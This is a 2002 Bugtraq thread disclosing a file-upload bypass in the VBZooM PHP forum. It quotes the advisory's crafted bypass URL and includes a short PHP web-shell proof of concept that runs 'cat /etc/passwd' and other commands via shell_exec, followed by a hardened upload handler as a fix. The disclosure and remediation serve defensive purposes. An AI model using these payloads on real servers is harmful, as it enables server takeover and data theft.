[27384] in bugtraq
Re: upload malicious file in VBZooM forums
daemon@ATHENA.MIT.EDU (M. Zeeshan Mustafa)
Thu Oct 10 15:53:52 2002
Content-Type: text/plain; charset="iso-8859-1"
From: "M. Zeeshan Mustafa" <zolo@pk.bluesoft.us>
To: bugtraq@securityfocus.com
Date: Thu, 10 Oct 2002 01:34:22 +0600
In-Reply-To: <20021009152109.14683.qmail@mail.securityfocus.com>
MIME-Version: 1.0
Message-Id: <200210100134.22469.zolo@pk.bluesoft.us>
Content-Transfer-Encoding: 8bit
The damage could be a lot more than assessed by hish in his last email: not just
infecting the visitors of the forum, but a critical server risk.
For instance, if an attacker makes a Perl/PHP script of malicious code,
he could take over the server with the httpd user ID.
An attacker could create a file with code similar to the below and upload
it with the extension .php ...
<?php
// Any one of these commands would do; each assignment overrides the
// previous one, so the last $cmd is the one that actually runs.
$cmd = "cat /etc/passwd"; // or
$cmd = "cat ".dirname($_SERVER['PATH_TRANSLATED'])."/path.to.database.headers"; // or
$cmd = "echo \"This is an example \">".dirname($_SERVER['PATH_TRANSLATED'])."/hacked";
$h = shell_exec($cmd); // runs with the web server's user id
echo $h;
?>
...and then he will call the URL from his browser to execute the script...
http://host/forums/<attacker-file.php>
and the said $cmd will execute.
Regards,
--
M. Zeeshan Mustafa
Software Security Specialist & Architect
E: security@zeeshan.net
C: +92(0)300-9249567
W: http://www.zeeshan.net
On Wednesday 09 October 2002 09:21 pm, hish _ hish wrote:
::::: Name: VBZooM
::::: Version Affected: tested on v1.01; other versions may be vulnerable too
::::: Severity: Critical
::::: Category: upload system
::::: Vendor URL: http://www.vbzoom.com
::::: Author: hish_hish <hish_hish565@hotmail.com>
::::: Date: disclosed on 28th Aug 2002
::::: published on 8th Oct 2002
:::::
::::: Description
::::: ***********
::::: VBZooM is a bulletin board system written in PHP.
::::: The problem lies in the file upload system: the script uses JavaScript to check
::::: for valid extensions,
::::: and you can bypass this check in two ways (see Details).
:::::
:::::
::::: Details
::::: *******
::::: there are two ways to bypass the JavaScript file extension check,
:::::
::::: 1st :
::::: you should be a member of the victim script,
::::: and go to make a new subject, now save the page on your hard drive
::::: and remove the JavaScript code // at the end of the page
::::: and change <form action="add-subject.php ......>
::::: to <form action="http://victim/VBZoom/add-subject.php ....>
::::: now select your malicious file to upload it (should be .php)
::::: OK now hit the submit button, the forum will redirect you to your subject
::::: douh :) your file is waiting for you as an attachment :)
::::: NOTE : all visitors can see and use your uploaded file, so forget the 1st
::::: way and see the 2nd: .
:::::
::::: 2nd:
:::::
::::: you don't need to be a member of the victim forum, just follow me :) .
::::: http://www.victim.com/VBZooM/add-subject.php?Success=1
::::: &FileName=SourceFile&FileName_size=500&FileName_name=DistFile
::::: it will upload your file to the "/download" directory.
::::: now execute your .php file
::::: http://www.victim.com/VBZooM/download/DistFile :))
:::::
:::::
::::: Fix Information
::::: ***************
::::: contact http://www.vbzoom.com
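Both findings in this thread come down to the same server-side gap: the only extension check is in the browser, and the second bypass (a plain GET with FileName, FileName_size and FileName_name set by the attacker) shows the upload script acting on request parameters rather than on the file PHP actually received. The advisory does not show VBZooM's source, so that reading of the second bypass is an inference. The handler below is an added example written for this page, not VBZooM's code or a vendor fix. It assumes a form field named FileName, an attachment directory outside the web root (the path is hypothetical), and a separate download.php that streams files back as attachments. It rejects both attacks described above: the crafted form post fails the server-side allow-list, and the parameter-only request fails is_uploaded_file().

```php
<?php
// Added example (not VBZooM code): hardened attachment upload for a PHP forum.
// Assumptions: upload field "FileName"; ATTACHMENT_DIR is outside DocumentRoot;
// a separate download.php serves files via attachment_path() with
// Content-Disposition: attachment and Content-Type: application/octet-stream.

const ATTACHMENT_DIR = '/var/lib/forum-attachments';   // hypothetical, NOT web-reachable
const MAX_ATTACHMENT_BYTES = 512 * 1024;

// Allow-list: extension => MIME type the content must sniff as.
// Anything not listed (.php, .phtml, .pl, .htaccess, ...) is rejected.
const ALLOWED_TYPES = [
    'txt' => 'text/plain',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
    'zip' => 'application/zip',
];

/**
 * Validate and store one uploaded file; returns the server-chosen file name.
 * Throws RuntimeException with a short reason on any failure.
 */
function store_attachment(array $file, string $dir = ATTACHMENT_DIR): string
{
    // 1. Only the PHP-populated $_FILES entry is trusted. Request parameters
    //    such as ?FileName=/etc/passwd&FileName_name=x never reach this code.
    foreach (['tmp_name', 'name', 'size', 'error'] as $k) {
        if (!array_key_exists($k, $file)) {
            throw new RuntimeException('malformed upload record');
        }
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $file['error']);
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_ATTACHMENT_BYTES) {
        throw new RuntimeException('attachment too large or empty');
    }
    // 2. is_uploaded_file() proves tmp_name came from this request's multipart
    //    body, so the handler cannot be pointed at an arbitrary local file.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // 3. Extension allow-list enforced on the server. The JavaScript check in
    //    the form is a usability aid only; a crafted request skips it entirely.
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('extension not allowed: ' . $ext);
    }

    // 4. Check the bytes, not the client-supplied $file['type'].
    //    A .txt containing PHP sniffs as text/x-php and is refused here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content is $mime, expected " . ALLOWED_TYPES[$ext]);
    }

    // 5. The stored name is chosen by the server, so the attacker's file name
    //    (including ../ or a .php suffix) never touches the filesystem.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = $dir . DIRECTORY_SEPARATOR . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($dest, 0640);   // readable by the web server, never executable
    return $stored;
}

/**
 * Map a stored name back to a path for download.php. The strict pattern means
 * only names store_attachment() could have produced are accepted; nothing
 * like "../../etc/passwd" or "DistFile" matches.
 */
function attachment_path(string $stored, string $dir = ATTACHMENT_DIR): ?string
{
    $exts = implode('|', array_keys(ALLOWED_TYPES));
    if (!preg_match('/\A[0-9a-f]{32}\.(' . $exts . ')\z/', $stored)) {
        return null;
    }
    $path = $dir . DIRECTORY_SEPARATOR . $stored;
    return is_file($path) ? $path : null;
}

// Handler for the add-subject form. POST only: a GET request carries no file
// body, so the second bypass in the advisory cannot even reach the validation.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['FileName'])) {
    try {
        $name = store_attachment($_FILES['FileName']);
        echo 'Attachment stored as ' . htmlspecialchars($name);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

The two properties that matter most are that the web server can never be asked to execute what it stored (the directory is outside DocumentRoot and download.php serves everything as an opaque attachment) and that nothing the client sends is used as a path. As defence in depth, if attachments must live under the web root, turn the PHP engine off for that directory in the web server configuration (for Apache with mod_php, php_flag engine off in the directory's .htaccess) so that even a file that slipped through is served as bytes rather than run as code.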